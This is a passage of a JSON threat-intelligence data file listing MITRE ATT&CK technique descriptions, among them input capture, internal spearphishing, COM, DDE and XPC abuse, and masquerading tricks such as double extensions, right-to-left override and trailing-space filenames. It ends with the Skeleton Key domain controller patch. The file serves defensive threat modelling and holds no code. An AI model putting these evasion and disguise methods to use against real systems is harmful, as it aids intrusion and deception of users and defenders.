"description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace",
"type": "similar"
},
{
"dest-uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d",
"type": "similar"
},
{
"dest-uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699",
"type": "similar"
},
{
"dest-uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0",
"type": "similar"
}
],
"uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f",
"value": "Input Capture"
},
{
"description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup>\n\nAdversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup> The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.<sup>[[THE FINANCIAL TIMES LTD 2019.](https://app.tidalcyber.com/references/5a01f0b7-86f7-44a1-bf35-46a631402ceb)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "4f4ea659-7653-4bfd-a525-b2af32c5899b",
"value": "Internal Spearphishing"
},
{
"description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup> Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Remote COM execution is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[ProjectZero File Write EoP Apr 2018](https://app.tidalcyber.com/references/2c49288b-438d-487a-8e6e-f9d9eda73e2f)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1559.001"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "8bc683db-1311-476f-8cae-45f3f89dcc66",
"value": "Component Object Model"
},
{
"description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.<sup>[[BleepingComputer DDE Disabled in Word Dec 2017](https://app.tidalcyber.com/references/d6f93310-77b6-491e-ba9d-ec1faf8de7e4)]</sup><sup>[[Microsoft ADV170021 Dec 2017](https://app.tidalcyber.com/references/ce960e76-848f-440d-9843-54773f7b11cf)]</sup><sup>[[Microsoft DDE Advisory Nov 2017](https://app.tidalcyber.com/references/955b0074-a1d6-40b5-9437-bd2548daf54c)]</sup>\n\nMicrosoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.<sup>[[SensePost PS DDE May 2016](https://app.tidalcyber.com/references/28b3c105-8d64-4767-a735-d353d1fee756)]</sup><sup>[[Kettle CSV DDE Aug 2014](https://app.tidalcyber.com/references/2badfb63-19a3-4829-bbb5-7c3dfab877d5)]</sup><sup>[[Enigma Reviving DDE Jan 2018](https://app.tidalcyber.com/references/188a0f02-8d1e-4e4e-b2c0-ddf1bf1bdf93)]</sup><sup>[[SensePost MacroLess DDE Oct 2017](https://app.tidalcyber.com/references/1036fbbb-f731-458a-b38c-42431612c0ad)]</sup> Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.<sup>[[OWASP CSV Injection](https://app.tidalcyber.com/references/0cdde66c-a7ae-48a2-8ade-067643de304d)]</sup><sup>[[CSV Excel Macro Injection ](https://app.tidalcyber.com/references/22c871ff-2701-4809-9f5b-fb29da7481e8)]</sup>\n\nDDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). DDE execution can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1559.002"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "82497cfd-725e-42f8-aaa7-4e20878a6a13",
"value": "Dynamic Data Exchange"
},
{
"description": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.<sup>[[creatingXPCservices](https://app.tidalcyber.com/references/029acdee-95d6-47a7-86de-0f6b925cef9c)]</sup><sup>[[Designing Daemons Apple Dev](https://app.tidalcyber.com/references/4baac228-1f6a-4c65-ae98-5a542600dfc6)]</sup>\n\nAdversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.<sup>[[CVMServer Vuln](https://app.tidalcyber.com/references/6f83da0c-d2ce-4923-ba32-c6886eb22587)]</sup><sup>[[Learn XPC Exploitation](https://app.tidalcyber.com/references/da995792-b78b-4db5-85d8-99fda96c6826)]</sup> This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1559.003"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "496998fe-4066-45cf-b84a-dc428e6819c8",
"value": "XPC Services"
},
{
"description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.<sup>[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)]</sup> Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "8bc683db-1311-476f-8cae-45f3f89dcc66",
"type": "similar"
},
{
"dest-uuid": "82497cfd-725e-42f8-aaa7-4e20878a6a13",
"type": "similar"
},
{
"dest-uuid": "496998fe-4066-45cf-b84a-dc428e6819c8",
"type": "similar"
}
],
"uuid": "afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4",
"value": "Inter-Process Communication"
},
{
"description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2).<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "3dea57fc-3131-408b-a1fd-ff2eea1d858f",
"value": "Lateral Tool Transfer"
},
{
"description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.<sup>[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)]</sup><sup>[[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)]</sup> In cloud environments, adversaries may leverage utilities such as the Azure VM Agents `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup>\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "309c7c8b-c366-5762-8611-136971ac4eb4",
"value": "Log Enumeration"
},
{
"description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversarys behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.<sup>[[3OHA double-fork 2022](https://app.tidalcyber.com/references/521b79fe-bb7b-52fd-a899-b73e254027a5)]</sup> \n\nOn Linux systems, adversaries may execute a series of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the “daemon” syscall to detach from the current parent process and run in the background.<sup>[[Sandfly BPFDoor 2022](https://app.tidalcyber.com/references/01c8337f-614b-5f63-870f-5c880b390922)]</sup><sup>[[Microsoft XorDdos Linux Stealth 2022](https://app.tidalcyber.com/references/6425d351-2c88-5af9-970a-4d0d184d0c70)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ed511983-98ef-572f-b5fc-0687f48467e0",
"value": "Break Process Trees"
},
{
"description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the systems policies.<sup>[[PCMag DoubleExtension](https://app.tidalcyber.com/references/a729519d-8c9f-477c-b992-434076a9d294)]</sup><sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup> \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) into a users system via [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) then [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.<sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup>\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7ae6fae6-b816-416d-8701-1cb471218fd5",
"value": "Double File Extension"
},
{
"description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.<sup>[[Threatexpress MetaTwin 2017](https://app.tidalcyber.com/references/156efefd-793f-4219-8904-ef160a45c9ec)]</sup>\n\nUnlike [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), this activity will not result in a valid signature.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "aa5a31d0-1b78-481d-a317-5089c1e111bf",
"value": "Invalid Code Signature"
},
{
"description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the files signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a files signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the files type. For example, the header of a JPEG file, is <code> 0xFF 0xD8</code> and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the headers hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and stored (e.g., [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.<sup>[[polygot_icedID](https://app.tidalcyber.com/references/dcd65d74-4e7b-5ddd-8c72-700456981347)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f91a7433-d5f1-5a47-8252-f02b513ce7f4",
"value": "Masquerade File Type"
},
{
"description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.<sup>[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]</sup><sup>[[Systemd Service Units](https://app.tidalcyber.com/references/43bae447-d2e3-4b53-b17b-12a0b54ac604)]</sup> Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.<sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Fysbis Dr Web Analysis](https://app.tidalcyber.com/references/f1eb4818-fda6-46f2-9d5a-5469a5ed44fc)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "86c2f355-3c97-44c1-9a83-e3d016f50535",
"value": "Masquerade Task or Service"
},
{
"description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "442f60ed-5195-45c3-9d8c-7e17cabe7869",
"value": "Match Legitimate Name or Location"
},
{
"description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. <sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). <sup>[[Elastic Masquerade Ball](https://app.tidalcyber.com/references/29c17b60-f947-4482-afa6-c80ca5819d10)]</sup> An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. <sup>[[F-Secure CozyDuke](https://app.tidalcyber.com/references/08e1d233-0580-484e-b737-af091e2aa9ea)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "14fa2a80-c838-462d-8c34-5a98a31a65ca",
"value": "Rename System Utilities"
},
{
"description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.<sup>[[Infosecinstitute RTLO Technique](https://app.tidalcyber.com/references/79d21506-07a8-444d-a2d7-c91de67c393e)]</sup>\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)/[Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.<sup>[[Trend Micro PLEAD RTLO](https://app.tidalcyber.com/references/9a052eba-1708-44c9-a20f-8b4ef208fa14)]</sup><sup>[[Kaspersky RTLO Cyber Crime](https://app.tidalcyber.com/references/38fbd993-de98-49e9-8437-bc6a1493d6ed)]</sup> RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "495604b5-f74f-4224-9c3c-f8aacf8aef51",
"value": "Right-to-Left Override"
},
{
"description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed <sup>[[Mac Backdoors are back](https://app.tidalcyber.com/references/c37f00dc-ee53-4be1-9046-0a28bdc5649a)]</sup>.\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1036.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "50dd9303-b6a5-417a-860e-26f4244ff580",
"value": "Space after Filename"
},
{
"description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd).<sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> Masquerading may also include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ed511983-98ef-572f-b5fc-0687f48467e0",
"type": "similar"
},
{
"dest-uuid": "7ae6fae6-b816-416d-8701-1cb471218fd5",
"type": "similar"
},
{
"dest-uuid": "aa5a31d0-1b78-481d-a317-5089c1e111bf",
"type": "similar"
},
{
"dest-uuid": "f91a7433-d5f1-5a47-8252-f02b513ce7f4",
"type": "similar"
},
{
"dest-uuid": "86c2f355-3c97-44c1-9a83-e3d016f50535",
"type": "similar"
},
{
"dest-uuid": "442f60ed-5195-45c3-9d8c-7e17cabe7869",
"type": "similar"
},
{
"dest-uuid": "14fa2a80-c838-462d-8c34-5a98a31a65ca",
"type": "similar"
},
{
"dest-uuid": "495604b5-f74f-4224-9c3c-f8aacf8aef51",
"type": "similar"
},
{
"dest-uuid": "50dd9303-b6a5-417a-860e-26f4244ff580",
"type": "similar"
}
],
"uuid": "a0adacc1-8d2a-4e0b-92c1-3766264df4fd",
"value": "Masquerading"
},
{
"description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any users account and/or credentials (ex: [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.<sup>[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "82d15799-9776-463e-9b87-a58d682cee55",
"value": "Domain Controller Authentication"
},
{
